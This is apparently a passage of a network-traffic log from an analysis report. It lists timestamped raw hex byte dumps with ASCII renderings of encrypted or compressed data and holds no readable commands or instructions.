                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7895INData Raw: ed 6f 16 38 cb 46 fa 91 26 b6 28 a6 3f 72 45 20 f9 1d 32 a3 63 eb 47 e8 48 fc ef 19 c1 a5 de f2 27 25 4a e6 e6 69 eb 32 95 96 f5 4a a9 b4 12 ba 8c be 66 0d f0 f1 3c d5 79 81 14 d8 4b e5 ae 63 8c 44 6a 13 42 e8 5d 15 13 ab d0 b1 e7 85 24 d9 b6 74 ad 98 3a f8 19 17 aa 6d e1 45 d2 a9 32 5c bc 43 6a 61 c3 78 9b 53 ed 0a 5a 03 5e df 6c fe 8d 6a 6b 3c ec 43 dc b0 6b a7 80 ef c9 90 ee 55 c4 85 23 64 d4 2c fb b8 44 1e 67 57 31 bd 0e 08 b2 2b 16 74 cf 6a ae d9 f1 23 36 59 3e e0 c6 25 f2 b0 69 03 d0 70 aa 30 58 3d 78 90 02 31 e5 22 3a cc f9 13 24 25 e8 c3 00 0a 79 88 19 5a d8 c8 e5 5e 95 36 5c d9 86 d0 b1 d7 10 c6 46 15 9c ee 32 c7 9b c0 75 c3 31 d4 0d 4e 20 36 34 de bc 1b b8 03 59 01 d0 b6 50 71 f9 87 68 04 9d 51 36 fd 4a c7 35 ab 23 b2 92 e6 0d f3 b2 20 c0 22 ab
                                                                                                                                                                                                                                    Data Ascii: o8F&(?rE 2cGH'%Ji2Jf<yKcDjB]$t:mE2\CjaxSZ^ljk<CkU#d,DgW1+tj#6Y>%ip0X=x1":$%yZ^6\F2u1N 64YPqhQ6J5# "
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7911INData Raw: 2a f5 cc a5 a9 42 70 81 8a c3 b6 19 34 09 b8 73 22 c9 a4 12 7e 1f 2f 85 46 2c 8e 07 5d 0a 2d de c6 25 1d 4b e1 df 42 a6 29 cd 7d 67 24 26 83 58 d9 b9 3e c4 f8 0f a5 6b 4b 0e 00 63 fd a3 5c 84 82 73 38 ea 66 1a 18 40 a9 42 1f 2f 90 36 32 85 f0 aa c5 c9 ba 09 73 83 2e e3 65 12 a1 e8 d6 94 4b 3d c7 38 7e 94 96 db 59 42 95 58 6a f4 17 c9 ae d2 2b 8c f0 d1 5b 7b 43 b7 b6 7b 60 a1 5b 43 65 1f 49 8f c4 a1 2d 79 95 95 a0 89 c9 d8 6a d1 fc 33 a0 4c 65 e8 3b df f5 a7 c4 11 4a 1e d6 54 53 76 b3 fd 1f 1c f2 b2 b5 b6 53 34 56 d3 25 e1 e7 e6 12 b9 14 c6 99 90 69 54 5c 34 f7 6a 27 af 86 4e d2 fa 66 a8 d0 e5 4c 14 44 e3 2e 29 83 01 f1 99 bb 9f 1f dd 8a 87 57 9a ab 59 f4 4c d5 b4 53 8d 78 0b 74 7e d4 3a 84 11 da b0 70 92 02 b5 64 4c c7 ec 3d 03 c8 45 c2 af 08 d2 56 85 3b
                                                                                                                                                                                                                                    Data Ascii: *Bp4s"~/F,]-%KB)}g$&X>kKc\s8f@B/62s.eK=8~YBXj+[{C{`[CeI-yj3Le;JTSvS4V%iT\4j'NfLD.)WYLSxt~:pdL=EV;
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7927INData Raw: 3b 70 0c a4 bd 7a 86 61 e1 1b 97 21 c0 e3 73 97 0b 75 7c f0 a9 eb b7 8a 66 0a c2 74 40 45 27 48 3a 68 03 68 45 12 21 f7 06 68 a2 d7 d9 9b d4 4e 07 13 1e 7f e8 4d c0 63 65 de eb 1c ae 6e ff d8 4f 27 07 36 47 9d 32 85 4f 13 69 bf 58 b8 13 0e a7 7f 69 d0 b0 32 39 a0 a9 f9 98 91 30 c6 b2 0c 8c 98 0e 06 72 f5 b1 13 56 69 50 8a 3e b5 bc 73 56 65 26 75 5b 78 87 bb 67 7c 29 88 b1 d3 24 4c 6c 3b 97 fe 58 db 02 af ed 37 44 e9 4a c0 18 a6 58 58 27 38 42 0c a8 e1 99 6a 4c 03 2f 3a dd ec e5 95 ad 9c ca c9 1d 9e 35 c3 8d 01 42 d5 a7 08 2c e5 93 a4 6f 0f 9e 7d 39 07 b2 ae dd 2e 1b 3e 39 cd 4d aa 0e 1b bb 39 ce 96 60 23 7d 81 46 c7 4e fe 27 52 0f c9 21 73 9e 4d 4c 08 4d a5 92 e6 93 69 01 e8 97 d8 96 52 c2 aa 7c ac 3c b5 bf 37 f1 99 22 40 0e 52 d3 62 ee b1 71 7b ba ce 6b
                                                                                                                                                                                                                                    Data Ascii: ;pza!su|ft@E'H:hhE!hNMcenO'6G2OiXi290rViP>sVe&u[xg|)$Ll;X7DJXX'8BjL/:5B,o}9.>9M9`#}FN'R!sMLMiR|<7"@Rbq{k
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7943INData Raw: e0 0d 7e 12 cc 86 2a 40 5b 6c db 1b ac 07 39 14 97 af fc 62 d2 72 71 dd 98 12 53 a6 3f 3e 64 f2 28 10 ca e6 ae 20 cb b2 b4 05 aa eb bd 8e af 79 b4 29 21 17 f6 fd 2e 64 f8 dc 40 7a a6 d5 23 62 3e 11 71 eb f5 bf c6 e0 0f 08 8c 1d 3d 40 1e ff ac b0 51 b6 3a 38 ad bd cd 3f 22 e6 bc c2 40 cb 5b 28 ce cf 1b 48 9a ea d9 aa 6d 0e e7 c8 61 b6 3a f2 e0 c7 f8 46 ff a1 33 7b af 95 7b 97 55 3a c6 3f e0 4b f4 5c 5f a7 ad 1c 81 3e b3 aa 6e 0e 3d 30 01 67 48 c8 83 82 3e 36 11 7b be 3d 33 62 55 4e af 01 07 36 78 a1 16 3f 12 db 6b 50 f8 b7 f5 15 4f 07 59 60 44 31 09 7f 04 a2 82 48 12 e2 37 82 77 21 5c f3 59 c9 06 84 b8 60 97 7b 78 a7 ad 81 3c 32 8a b1 8f ab ce 9d c8 96 85 bc 63 0d 0c f7 45 b0 09 26 ca 93 3c ef 3c 7a 59 b1 52 5e 29 db ef 92 af a2 23 93 b6 23 90 10 4b e5 b2
                                                                                                                                                                                                                                    Data Ascii: ~*@[l9brqS?>d( y)!.d@z#b>q=@Q:8?"@[(Hma:F3{{U:?K\_>n=0gH>6{=3bUN6x?kPOY`D1H7w!\Y`{x<2cE&<<zYR^)##K
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7959INData Raw: 59 eb 06 16 a7 b3 95 1e 31 e4 16 bb e0 d1 ac 5b 44 f6 5e 59 ee d9 b0 6b a2 09 40 38 99 e9 1d 36 27 1a 12 01 ba bd 5a 0e 39 1f fa f3 08 66 b9 22 97 f8 fe 6c d7 c1 ae 1b 7c 9f 41 b2 bc d2 64 14 39 22 bb 7a 0e d6 c2 c7 1f 81 d5 65 0e 21 3a 69 69 3b 68 ee 67 01 e2 80 00 20 41 83 f1 b3 47 4a cd ec 23 35 7f 83 f2 4c f1 cd 59 6e 62 14 e8 72 c4 60 9d 15 74 ed 14 bb 34 0f 63 89 81 9b d2 a9 47 25 22 e4 07 6b cc 80 30 ff 57 ba 86 cd 36 c5 e1 3f 95 d8 30 5b 2f ce 29 69 91 99 4e fb 6b 48 94 5f 22 56 04 f5 ef 83 3c 4b f7 8d 3f 67 27 73 78 09 1d 51 1b 9c 6c 35 40 86 b2 24 73 58 4f 6c 2d a2 09 09 c9 ce bd 69 dd 26 65 f1 3c 57 be 59 79 e0 ef f3 cd 19 bf 20 e7 ee 73 b9 7c 16 1d cf d2 d2 41 47 32 03 51 a7 11 aa 24 46 89 7d 31 f0 e2 6c 8d 78 7f 8f 4f 7d ff 01 b2 53 df ce 25
                                                                                                                                                                                                                                    Data Ascii: Y1[D^Yk@86'Z9f"l|Ad9"ze!:ii;hg AGJ#5LYnbr`t4cG%"k0W6?0[/)iNkH_"V<K?g'sxQl5@$sXOl-i&e<WYy s|AG2Q$F}1lxO}S%
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7975INData Raw: e6 4f fe 35 6e f1 b3 53 3d 26 90 15 df 43 87 fc 6a c3 46 8a 9d 4f a6 65 70 17 cf 7c f5 24 e3 56 30 6b 7c 33 03 c3 93 01 1f 1f d1 19 78 39 e0 af 4e 4a 19 b4 b2 39 2d 58 0d 07 a7 96 9b d0 c8 57 9c 3d 6f ad bc 8d 6e 55 77 86 c5 54 89 96 d9 28 29 04 3e c4 e5 f1 54 4c 45 be d1 62 94 7e a1 c6 de fe e0 cc 67 d6 89 35 0e d9 a0 86 cd 77 ca 78 25 4e d5 f5 68 5a 28 e7 b8 1e a9 b1 94 5d 3e 67 0e 41 92 98 26 b8 68 25 c1 7b 95 d0 4f 40 ab 7e 90 1f 15 c0 1a 80 10 a7 aa 4d 7f e5 c6 af fc c9 c7 29 6a c2 e3 54 a6 82 20 4f 00 f7 41 43 ec db 1f 8d 31 f0 42 a6 72 15 ac 2f 5f 78 4d fb 45 25 56 4c c2 d8 76 16 6d aa fe 4c 4d 7a 4e 38 0f 3a a4 09 54 1b 8c 44 20 33 61 73 7d 28 84 31 8a 9e 53 8a b6 15 57 44 80 8d 56 4d 73 b9 24 ae ce d1 a7 7e 62 74 84 c0 bb 03 e4 9e 5c 3f be 1c f9
                                                                                                                                                                                                                                    Data Ascii: O5nS=&CjFOep|$V0k|3x9NJ9-XW=onUwT()>TLEb~g5wx%NhZ(]>gA&h%{O@~M)jT OAC1Br/_xME%VLvmLMzN8:TD 3as}(1SWDVMs$~bt\?
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7991INData Raw: c6 94 b9 22 b4 ba 6e 80 50 57 65 96 f9 22 4e 0e db 46 e5 43 18 4d cd 96 46 a0 6f 2e 21 0e 69 89 f7 e7 3f 32 b0 a9 5f bf 02 de b2 49 12 27 9e 98 26 40 a9 b2 1f 73 72 6e 4a 7e 76 81 e1 b9 ab 06 9b 42 ba 4a 4a 3b 9a c4 d4 75 67 42 3b 22 31 63 d0 63 39 b0 68 ed 23 fe a3 3b 18 cb 82 7f 03 21 e9 25 cf a7 6b 6b dd 7a c1 3e da 94 30 b8 93 48 d7 f2 03 6c c6 97 ff 4c 39 19 0a 11 aa 29 20 b1 fa 6a 37 ef fe 50 d3 ea f6 37 77 92 c7 20 bb 48 1d a9 16 4f 75 4a fb 53 8e 3e 7c 1e a7 6a fb b2 00 e5 91 51 8f 40 91 aa 41 55 dd da 84 2f e7 94 c3 d6 04 bb 34 56 6b 6a 4c 5f 08 3d 13 9d ba 06 fa 06 96 db 6d 50 f6 c6 03 2f 2d d6 d6 52 d0 33 98 92 f9 38 20 b3 91 3a 07 cc 97 76 5d e8 f1 f6 b7 5a 67 3b 3e 2b a4 e3 8b 94 fa 21 88 c3 83 fe 11 bf 18 59 09 84 ce c8 b1 bb 50 19 2e 18 bf
                                                                                                                                                                                                                                    Data Ascii: "nPWe"NFCMFo.!i?2_I'&@srnJ~vBJJ;ugB;"1cc9h#;!%kkz>0HlL9) j7P7w HOuJS>|jQ@AU/4VkjL_=mP/-R38 :v]Zg;>+!YP.
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC8007INData Raw: ca 57 9c b4 04 f7 d7 e3 02 4a cf a0 a8 20 02 0e 3c a2 07 1e eb 46 db 75 ea f3 46 7e f2 3c c1 d1 70 13 c2 4a f8 6f 4c 55 5f 73 f7 b1 94 22 fb ff 5f 00 1b 24 8f 8e 42 37 1d 25 9c a7 cd 20 9c 78 b2 23 47 87 fa 47 3d 91 66 78 c0 06 d3 05 ac 8a fa f8 2e bd 7d c6 79 30 3e 23 f1 bc 89 e3 1b a2 e5 44 f1 a0 56 57 bd 81 eb 5c 40 db 9c 5f 72 55 f8 c7 d7 59 0d ff fe a6 b5 85 8f c0 fb db 14 cf 5c ed 56 34 5a cf 06 d0 34 db 2c c9 53 2b 69 ed 1e 91 4b 84 2b 71 f8 15 18 f9 19 9c 2b bd 2d 33 30 8a 70 2b 53 5e aa 88 73 20 13 8d eb cc 48 11 77 f4 4b 83 a8 4c 95 52 72 b3 85 11 1c 54 83 e4 bc 6e d8 c9 f0 92 e3 88 8f 4e ca 84 cf a4 47 45 ad 85 00 77 27 6b 5b 15 d2 48 08 61 2b 13 4b f5 dc 10 86 e5 b7 00 0c 82 15 7b 51 51 4d 78 89 b3 24 dc a7 7c 7c 2d e8 83 e4 b2 40 17 d8 1c cb
                                                                                                                                                                                                                                    Data Ascii: WJ <FuF~<pJoLU_s"_$B7% x#GG=fx.}y0>#DVW\@_rUY\V4Z4,S+iK+q+-30p+S^s HwKLRrTnNGEw'k[Ha+K{QQMx$||-@
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC8023INData Raw: d4 74 be b6 47 29 ce 17 be 51 8f aa 18 93 1a d6 2d 06 80 15 35 30 02 0e f4 f7 f9 f1 7f a3 a9 c7 9d 4d 41 b2 c9 23 8f 4f b1 56 81 33 40 bc 0e b2 39 0b 09 fb 82 0b e0 52 f3 aa cc 01 a4 3c 3c c9 96 27 e5 8b 88 df e5 dd 0a 6e 7b d8 1a 3c b8 dd a9 e4 2e 2a 7d 14 bb db 5b f1 7d 56 38 03 db 7a 30 30 d7 ae f3 be d6 ef 09 0c ff 12 87 48 38 2c 81 40 6b c1 b7 c9 e6 55 c0 14 1f e4 ab df 8a 4e 31 14 ce 82 f6 61 24 40 70 2f cd 83 ea 7b f7 f4 cc 7c 6e 01 27 e2 e9 09 0e 11 9d be d7 e3 ae 4e 2e e1 2c e0 ec 8d 62 ba 9e 65 bf a5 04 28 93 1d fb 2e 24 28 62 01 85 65 db a0 de 82 16 bc d3 ce 5e d1 71 bd 78 49 3e e8 48 f6 fb e6 0a 82 5d cd a5 7b 92 40 56 62 65 3d 82 c4 85 f5 6b cb 46 0a 1b 9b 4f 3f 8d c7 02 8c 37 db 44 39 86 af 45 e3 97 77 ac 6f f9 1a 7d 3e d7 0f 97 e4 7f 99 bf
                                                                                                                                                                                                                                    Data Ascii: tG)Q-50MA#OV3@9R<<'n{<.*}[}V8z00H8,@kUN1a$@p/{|n'N.,be(.$(be^qxI>H]{@Vbe=kFO?7D9Ewo}>
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC8039INData Raw: 30 50 5d 2c 21 d4 32 52 99 ff 8b 23 1f b0 61 16 6c 6f 1d bc 44 da 5f 21 ef 54 75 d4 04 40 57 06 6d d4 31 a4 24 84 3e 81 2b 6e 94 1f 0d b0 60 89 e8 26 d4 c9 40 00 4d f1 cc 61 fa 10 9c 69 0e 86 36 ba f4 9c b4 d6 9a 40 cb 28 11 04 4c 71 1b 8a 75 7a d5 fb 1a 59 df 04 1d 9f e8 71 ce d4 e1 16 87 94 82 80 d7 58 70 2b be cb 4c 19 7e c3 94 5c a1 86 f1 8c 33 54 30 22 4d 2f 69 28 6e 3d d3 0a 87 d0 3a 7f b5 76 ee 0c 29 fb 84 e2 59 16 e7 6c 6b d4 6f 66 ee 6e 12 d7 42 90 49 01 5f 81 f7 d3 c7 80 a2 5e b0 97 7c a9 de 97 a7 df f0 29 90 ef 2c db d6 fa a8 a7 be b1 cd 08 21 c3 3b 65 67 04 32 57 9b 9d e0 4d 8b 9e 13 0c 95 4d 3b 70 ca e3 a0 bb 32 5e ef 3b 4d fa 09 68 04 d7 2c de c5 20 9e 26 41 25 35 16 f9 d6 32 c0 09 0a 37 bf b8 63 30 3e 42 9c 31 2a 5c c4 3d 5f b1 7e 7a 5a a7
                                                                                                                                                                                                                                    Data Ascii: 0P],!2R#aloD_!Tu@Wm1$>+n`&@Mai6@(LquzYqXp+L~\3T0"M/i(n=:v)YlkofnBI_^|),!;eg2WMM;p2^;Mh, &A%527c0>B1*\=_~zZ
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC8055INData Raw: f9 46 be b9 4b dc ff 3c 92 d1 b9 dc bd 6b be 2e 5d fc f8 83 66 de bc e2 05 2f 49 af 9b fb 19 d0 b2 e0 2b b5 60 da b5 83 f8 7e 49 c5 d2 ec 46 da 42 bb cd 2b ad 54 ee a8 25 68 77 7f 89 d2 a6 26 42 a5 76 e0 1d 63 89 50 6e ae d6 bf b1 b4 38 a7 23 7e e1 3b 04 7e bb 6b 71 a6 a5 b9 25 7b f4 2b eb 03 07 21 c0 50 d7 38 47 62 a7 13 9c 97 81 3b 7c 34 55 e7 e5 fa 88 33 fb 1b 16 1f f5 b4 71 28 80 26 58 68 4d d8 c9 7e 94 5e fd de 7d 10 ca fb a9 82 dd 74 11 34 d3 be de 52 2d 48 e8 f8 aa 16 6b ef 69 48 0b 3c c9 70 2e a0 ee c5 ad b2 b6 9f 5b 55 4c dd 20 76 81 c6 f5 0c 16 b2 c7 57 9b a8 b7 62 c8 38 94 9c e1 3c ae 46 1f 5e c4 a2 1f 49 ec ea 59 14 7b f0 b6 41 28 58 bd c2 7e b4 4c 16 b2 bf 53 84 c5 f7 58 1e 66 ee 42 b3 8b 92 06 73 91 56 39 bd f7 15 0a 19 d7 f8 b4 55 78 a5 57
                                                                                                                                                                                                                                    Data Ascii: FK<k.]f/I+`~IFB+T%hw&BvcPn8#~;~kq%{+!P8Gb;|4U3q(&XhM~^}t4R-HkiH<p.[UL vWb8<F^IY{A(X~LSXfBsV9UxW
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC8071INData Raw: 15 6e 4b 42 5b dd ee 4f c1 51 d0 35 b8 41 bd 44 f7 94 39 de 3b e5 c9 be 49 78 ab 70 c6 52 52 60 6e 30 a7 f2 71 65 77 80 78 5d a2 a5 8a 4d c2 5e cf ea 24 7e 86 50 85 82 22 8b 04 13 c3 f9 a7 6b c2 4b 4d 8a 89 41 f1 0c b9 a0 e8 8a 12 85 d7 b4 57 69 f5 1c 8b 93 5f 2b ec 76 6c 3d 5f e9 bb f1 73 58 aa d2 fa 95 07 44 71 0a 51 b3 f8 92 9d ac d3 c4 c4 b2 f7 4a 46 4b 3c 1d 7b da 7f b6 19 87 48 a9 63 ec d4 99 78 b3 95 72 a5 47 2f ef ec 6c 1a e6 64 48 7d 73 8b 36 64 54 49 98 38 57 c9 e6 0f 1d 4f a5 cc 93 87 e8 31 76 be 7e 8f ef 4c 8b 3e dd 36 a8 ce c3 ae 6f 51 06 e4 64 d3 81 fa ed e5 fa 2e 4c 10 75 bf 58 be 01 cc 18 4c f7 8e ff b6 e4 dc c7 49 ef db 7e 8c 0a d5 50 a2 45 12 c4 58 70 ee c8 a9 7d c0 5e 6e 6c ad 0a da 91 f0 72 a4 77 bb f7 3e 11 94 87 e4 6a 55 32 8d 27 dc
                                                                                                                                                                                                                                    Data Ascii: nKB[OQ5AD9;IxpRR`n0qewx]M^$~P"kKMAWi_+vl=_sXDqQJFK<{HcxrG/ldH}s6dTI8WO1v~L>6oQd.LuXLI~PEXp}^nlrw>jU2'
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC8087INData Raw: 22 ff 30 c6 38 26 ba ff e7 6c 5b 3b 86 20 f9 81 6a d8 f8 e0 8a e4 6f b3 9c 71 27 7c 20 21 ad f3 2e 1c 63 11 d6 bb 9e 26 79 7c 60 05 25 db e6 86 b4 51 47 c9 f7 3b 6d 24 b6 69 06 7b 5f ec 92 a8 1f e6 65 6e 71 ef 83 04 2c 7e 96 ad 5e f8 be 4a 37 ab 30 eb 41 a8 aa 84 f8 ee 4a 59 f7 da 8a d6 1a e3 3b 22 bb 8f be e7 15 13 a4 ed d8 f5 5d ad 4f d2 98 3c a9 0d 9b 52 28 f0 d0 92 db bd 5f 71 08 65 2d 89 be 4f 7d c1 ed 4b 22 1b fd 8c 51 f9 c1 27 40 ab fa ce d4 1c 20 59 05 45 81 cf 9d ef 33 d6 56 a2 c8 ff 35 e2 1d 25 3a 90 2b b8 79 65 d4 8a 92 2d ba 31 b7 63 94 bd b7 aa 7b 89 86 ab 8c 80 0a a8 4e e4 c7 78 f9 ce 81 8d 2c b2 1e c5 bc e0 8d d0 55 77 78 58 3e 35 43 33 f4 06 b2 df df 54 bf 99 eb 84 71 34 90 ad b2 00 52 84 f8 b7 99 d6 ce 32 9f 3b 13 d2 b4 27 d3 cc 59 c1 76
                                                                                                                                                                                                                                    Data Ascii: "08&l[; joq'| !.c&y|`%QG;m$i{_enq,~^J70AJY;"]O<R(_qe-O}K"Q'@ YE3V5%:+ye-1c{Nx,UwxX>5C3Tq4R2;'Yv
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC8103INData Raw: cc 7a 3e 69 44 d1 ad b7 59 6e 76 ad 90 52 11 e4 86 d9 c4 61 42 85 41 0d 4e 9e 78 35 8a 8a a7 9e 6e 1d 6f d1 ef 77 11 bc 25 00 dd de a6 da e7 4e 52 cf bd 4f 33 f9 ed 7e 08 d9 4b 25 4b f6 90 ca 4d 1f 70 d4 49 d7 77 10 53 55 55 22 fd 2f a3 36 50 ef 6e 9f 28 36 96 27 1e f4 a6 3a 56 65 3e de 94 2a 8c 8e c0 52 87 c7 03 fc f6 31 0e 43 09 3b 51 c9 f8 06 98 48 70 92 93 56 d6 6e 67 99 9c 01 a9 8f ae 80 f9 79 a2 f2 99 e5 0c ec 8c a8 01 fd 08 4b fa 41 ca a0 6e 32 84 8c b4 bc 4a 15 e0 62 e1 06 44 b4 b8 ff 05 b1 a5 9b 59 ea 34 8c 42 53 d0 f3 1e f0 33 1f 5b 1a a9 50 f6 99 1d 76 df a2 63 a7 fb 26 12 96 d7 1a c9 ca 7e c1 04 8e cc 97 65 f5 23 e4 04 98 da 43 88 65 4d a5 04 64 c9 78 24 20 c6 ac e0 64 2d 66 5b e1 f5 24 58 96 a5 b6 0e a3 5d 3d c1 23 dc 40 26 bb 26 92 80 fd 0a
                                                                                                                                                                                                                                    Data Ascii: z>iDYnvRaBANx5now%NRO3~K%KMpIwSUU"/6Pn(6':Ve>*R1C;QHpVngyKAn2JbDY4BS3[Pvc&~e#CeMdx$ d-f[$X]=#@&&
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC8119INData Raw: c1 fc 53 9d 5a 3e ea 86 86 05 82 01 7a 74 89 df 24 03 31 8b 63 9f 75 4c 17 9b ab d6 09 43 a5 45 83 0e 9a 27 78 93 97 6a 82 28 54 cb d6 3b a4 eb d7 49 74 97 9c 64 1d a5 cd 17 87 9e 96 b5 87 02 9a 37 4a 1a 09 db 7b 0d b4 08 01 92 d9 0b 70 37 35 b6 cc f1 07 18 de fa 2e 71 c1 0b ee 9f 3a 57 ae ff ed 2b 55 1a eb 94 05 1d 74 bd 02 75 dd 1a 95 bb de 37 7d 24 c1 a1 23 54 44 90 49 60 19 b1 66 8b bb 19 65 de 62 57 77 7b 46 d1 b1 6f d0 d9 f4 46 1c 7e 8f 3f 61 0e 8c d0 22 ad 97 bb b4 ff 3f ef 23 b0 e2 97 ed 1c df 89 b0 27 dd 26 6d a2 29 34 f1 10 c0 75 d8 d6 f4 ac 69 90 eb 4d f8 ef 32 b0 2c b3 16 52 19 0e 14 2a fb 9b 47 68 e7 9b 8f 35 06 9f d3 69 aa 7f b6 d2 57 ae 95 25 3c 8f 2a a9 19 fd 9f f7 cb 98 5b c0 34 f1 70 9b d5 2e 3e 1c 44 8b 5a 0c 74 f7 fc 0b b1 3b f6 85 e8
                                                                                                                                                                                                                                    Data Ascii: SZ>zt$1cuLCE'xj(T;Itd7J{p75.q:W+Utu7}$#TDI`febWw{FoF~?a"?#'&m)4uiM2,R*Gh5iW%<*[4p.>DZt;
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC8135INData Raw: 06 cd 95 0a 36 e0 d6 33 ec da e4 3f 8b e6 f5 6b f5 0d fa d3 7d db 42 61 3c 3e a8 fa e3 18 87 40 7b 99 01 7c 4e 97 33 32 b6 a7 d4 44 f8 4b da cd 7d 70 4b 9c ac e5 8f f5 6e 80 d1 10 a7 ee da 1d a0 18 c5 d7 56 3e 10 dc fd 9e 0f 1d bd ba 06 21 49 d2 b9 12 c8 21 49 35 2a 77 be fd 6a 35 74 a3 8d 92 02 0a 89 ef 39 5d 6a ea 17 55 ef 70 69 73 c4 77 31 a6 df 7e 5e 71 78 cc a2 ff c1 c8 69 c4 c7 36 b1 b7 c7 e3 88 76 0d 19 44 8c 19 49 19 67 ba b1 dd 44 8e 52 7d 46 f4 40 40 cf a7 3a 93 30 87 91 d6 53 37 40 3f ef 44 73 0a 06 c1 31 d6 11 ee a9 e2 34 8d 0c 83 27 35 80 62 ed 97 7f b2 d0 6f 3e ce 2f 7c 94 4b 0a 8c cf 1e 80 bb 62 ac c0 a7 1e 4c 18 eb 0a f5 9a 34 23 7a f5 81 65 51 75 93 b4 18 06 75 ef 52 14 4a 49 6d 96 22 9b 8c 26 f3 ba 29 76 34 78 71 5f 30 07 d9 62 19 43 41
                                                                                                                                                                                                                                    Data Ascii: 63?k}Ba<>@{|N32DK}pKnV>!I!I5*wj5t9]jUpisw1~^qxi6vDIgDR}F@@:0S7@?Ds14'5bo>/|KbL4#zeQuuRJIm"&)v4xq_0bCA
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC8151INData Raw: 38 fe a6 7a be 8f d7 2a bb 68 b2 a6 c0 a1 ee 9d f0 6f 85 a7 0f 02 39 7d 9c 43 0e f5 51 e6 c9 ec 5e a6 6f bf 0b 9c 19 a5 8f 46 5e 7e 63 36 ba 5e 6b f0 3a 57 aa 19 c4 1b 43 2d cb 15 e5 5e e7 b3 00 78 ec c2 63 20 45 02 b2 30 ec e6 e7 86 95 eb 9b 58 30 13 0d 67 e5 fd 6d 33 b6 32 bd e8 db 2c 93 ab f1 23 3c 87 17 ee 61 5d a4 c6 c8 72 4f e5 18 dd 7c 6e 21 a9 d5 c6 02 b8 ec b7 92 a2 ec e0 cf c7 68 57 d3 34 42 fa 63 9a fd e6 96 5f 97 69 d3 03 57 42 eb 15 8c 39 9e 12 3d 9e 76 79 10 9d c6 49 7b ad d7 e4 00 45 b4 67 01 e2 47 46 5d 6d 7c 87 e3 b3 68 be 81 00 e9 d3 60 48 28 48 4f 26 0a ae 9e 12 95 eb 94 ef 28 08 f1 3b 06 d6 3e 01 ca f6 a1 f3 79 f9 fa 86 f7 16 1f 59 60 d9 45 b4 a9 5f 71 2b 2c d8 22 7d 5b ef fc b7 6e c6 fb 93 8a 8d 0f 1e 48 08 15 fa d4 bf c4 63 64 44 77
                                                                                                                                                                                                                                    Data Ascii: 8z*ho9}CQ^oF^~c6^k:WC-^xc E0X0gm32,#<a]rO|n!hW4Bc_iWB9=vyI{EgGF]m|h`H(HO&(;>yY`E_q+,"}[nHcdDw
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC8167INData Raw: 34 38 b7 63 f1 81 76 d3 7f 5a 54 08 0f 80 88 89 8d 0f 94 52 9c 59 32 6d f3 fc fd fe e9 61 ec 21 18 7b 84 18 d9 96 fd 19 d7 d5 17 a1 13 cd f5 2c cb af c3 b8 ae d8 01 48 08 fe b3 86 5f b2 06 b2 a2 22 68 e1 2d 33 c7 1c 34 91 de 06 99 77 a8 dc df 1f bc da d4 23 83 c8 28 15 a3 e8 6b 5d ed 5a 72 81 84 e6 bd b7 0b 4c 9e 25 de 62 4a f0 ea 81 6a b1 4f d5 0e 4f 81 c5 4c e5 81 95 76 b6 a1 94 af 6d c2 41 5e 94 e3 a6 4b 3a b2 f9 40 f9 86 b1 9d c8 af 39 de c7 9e 98 dc 2d 17 f1 20 3d 82 42 31 75 16 09 c2 14 39 7f 53 d6 5f 6c e2 95 96 30 a4 2c 24 b6 b8 92 5f 09 a9 7f 29 46 39 0a 27 7b 87 eb 1a bb 20 fd 81 64 f1 ea a4 ce 13 7a 4d 39 7c 9e 5f 21 e0 4f 6e 41 42 2d 40 89 b4 ca 1b d1 01 c3 06 dd 3e 89 d2 b3 aa 28 4c a3 a9 2f d1 63 0c 69 79 db 29 c0 12 49 34 75 6a 63 74 9c 00
                                                                                                                                                                                                                                    Data Ascii: 48cvZTRY2ma!{,H_"h-34w#(k]ZrL%bJjOOLvmA^K:@9- =B1u9S_l0,$_)F9'{ dzM9|_!OnAB-@>(L/ciy)I4ujct
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC8183INData Raw: 26 48 2f 03 4f ef 5d 63 4e c6 d3 37 65 64 88 18 99 50 07 c1 6f d3 e6 a3 54 d6 43 63 3a ba ba 6d ad e3 b4 f1 62 9e fe 3c e5 30 a5 b3 7a 52 a3 dc 82 2d a8 bc 92 94 99 8f 0d c9 ab 4e d8 7f 70 aa 6a 61 c1 a1 0c 26 86 8e be 76 14 97 ba 24 ad a0 a3 a0 79 31 2a a1 a8 3b 00 b3 2a 77 1e d5 f3 71 38 c9 1b ca ac 1f e6 8e d5 cd 8e 7b af f6 c1 b6 1a 7d 45 6c 45 f9 67 bc b1 ed c8 1e 6f 27 0b 3b 90 54 4c 57 0d 3c 75 bd 8b 9e b0 68 b1 61 ad bd 50 e2 15 54 12 e6 1e 28 fc 57 ec 1a 4e c7 28 ac 1e d7 fc 02 a6 ba 7c 45 ec 6e 0a 99 b6 0c b4 6e 88 c9 d4 fb 0b f7 df 70 c4 d1 d4 14 8c 07 29 84 1e 0d b3 6b 64 78 7c 69 6e 40 e2 90 70 53 b1 00 a8 93 23 4a a0 b6 10 81 17 90 e2 c5 66 76 06 f6 fa cc a0 c7 09 34 12 18 13 d0 50 5f 8b de 66 1f b6 9f f1 d5 df 39 f2 fe 30 6c 9c ab fd 81 53
                                                                                                                                                                                                                                    Data Ascii: &H/O]cN7edPoTCc:mb<0zR-Npja&v$y1*;*wq8{}ElEgo';TLW<uhaPT(WN(|Ennp)kdx|in@pS#Jfv4P_f90lS
